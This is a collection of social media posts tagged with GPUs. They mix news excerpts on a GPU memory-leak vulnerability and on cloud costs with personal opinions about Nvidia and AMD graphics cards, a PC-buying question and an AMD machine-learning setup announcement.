My interpretation: "If only the big AI companies are buying our #GPUs, then that is a limited market. Let's increase our market to national governments"
#AI#Cybersecurity#LLMs#GPUs: "As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs—including Apple, Qualcomm, and AMD chips—that could allow an attacker to steal large quantities of data from a GPU’s memory.
The silicon industry has spent years refining the security of central processing units, or CPUs, so they don’t leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven’t been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York–based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern."
🔥 Most companies using #AI are ‘lighting money on fire,’ says Cloudflare CEO
“If you look at big cloud providers, one of the decisions they made early on was to make it more expensive for you to move your data from one region to another or from one cloud provider to another. AWS, for example, marks up their transport costs 4,000 times what their underlying costs are. And what that is doing in the AI space is actually further artificially constraining access to #GPUs”
As of November 22nd 2023, my experience with #Wayland#KDEPlasma on #Nvidia GPU is still atrocious, while on #AMD is almost flawless ... Seriously thinking swapping my RTX 3060 in my secondary PC with RX 6600 despite expecting slightly worse game performance ... Screw Nvidia ...
@weipah Cool, that's interesting setup ... This is rig is more like spare parts splice - I had an older Intel based PC and a lot of #GPUs lying around left from 2021 #crypto craze, not my first choice and only occasionally used in my 2nd home. I love ray tracing, but I would still rather go with AMD, I dislike #Nvidia that much 😎. I still game at Full HD only and for the games that support so far, my RX 6700 XT performace with #raytracing is sufficient.
Does anyone know anything about computers? I've heard pros and cons about pre-built computers. I also don't know much about what parts are worth buying, especially GPUs.
It's funny how we made screens so high resolution that it made it hard for #GPUs to render games so the best solution is to keep the games rendered at low resolution and just let #AI guess what the pixels in-between should be, because it turns out our eyes aren't really that good.
🔥 #AMDlabnotes presents another new article - this time to assist data scientists/ML practitioners get their #PyTorch or #TensorFlow environment up and running on #AMD#GPUs 🔥